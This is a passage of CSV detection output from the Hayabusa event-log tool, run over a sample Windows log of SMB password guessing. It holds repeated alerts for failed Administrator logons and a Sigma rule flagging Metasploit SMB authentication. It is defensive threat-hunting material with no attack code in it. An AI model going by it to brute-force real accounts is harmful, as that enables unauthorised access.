Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.416 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QQJICDi3T4LiwXZc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.416 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.465 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hnlKkfHYT0ID3BWr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.465 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.510 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gw36XaWrYp2M9CZd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.510 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.544 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: j9aT76CAAER0H98I : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.544 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TEOZfrP3IYmutAuq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.580 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.628 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zd54DAwwp0BJhhaZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.628 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.665 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AR6Gc128RlPtwcPl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.665 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.713 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cpjS1YZy2sSRqzI3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.713 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.756 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EKeate89Gw1oEp0U : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.756 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.801 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tBhApsBYa65Hxr0L : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.801 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.894 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ITv5RS3WHhWe0Hez : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.894 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.940 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WASvcAp9zfU3uSka : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.940 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.972 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: H1f6szOactEp5ntF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.972 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.008 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Loe5RkT9Ki0Aw2Lv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.008 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.052 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TJdVtE7dNSoyM3LI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.052 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.092 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QlAtU1mIO7m5DnuP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.092 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.132 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wAK2rh94yKwiH2Nw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.132 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.168 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AuqsvmUbPlpWFBRZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.168 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.208 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BShEB6VnXkOxwtFB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.208 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.248 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AjAc5QMvpTBsDziO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.248 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.288 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Fwwp5CD20dR8QrIo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.288 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.329 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tL6GzVzndZL7DZMN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.329 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.371 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zK5IpESvDA2DexwL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.371 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.404 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qvTyabCyGaxscOrN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.404 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.437 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FW8VghddPwP5C6dO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.437 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.476 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xGZuyZ0LErZ3Sgty : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.476 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.515 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bT1xrvfndr5R8Vg3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.515 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.560 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: H6RFTZVJE9remzqs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.560 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.599 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pzjwzORvTwuBPLEs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.599 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.644 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UMjSFfZ88BV2sT1F : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.644 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.681 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SnpCLI2EJZRhr3vz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.681 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.724 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ztEU2m9SwbqgSdVY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.724 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.760 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MHO1X0zwmoWotcM4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.760 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ck429g2Cs4siVVq4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.796 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.835 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9txH9zA3oY885iTi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.835 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.876 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: alIIEzE2rTrNtOtr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.876 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.921 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ww4BXLwhaNxOttgo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.921 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.977 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GPdz2pjDocMWqctT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.977 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.016 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QOm1i2a20IDNmIu4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.016 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.056 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ukSrSu516dHlHQ94 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.056 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.088 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: grdERCipFl1FMB1o : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.088 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.129 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MmpuUsIRbp57KCRD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.129 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.168 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VWLuqrOQSQuqcwUr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.168 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.212 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eEASOf84AX8ow4vf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.212 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.254 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IcgNTGlESh6FytEY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.254 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.302 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OeVo7D3oBsdUMHfj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.302 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.348 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mLqSB2yGMksaBgUS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.348 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB 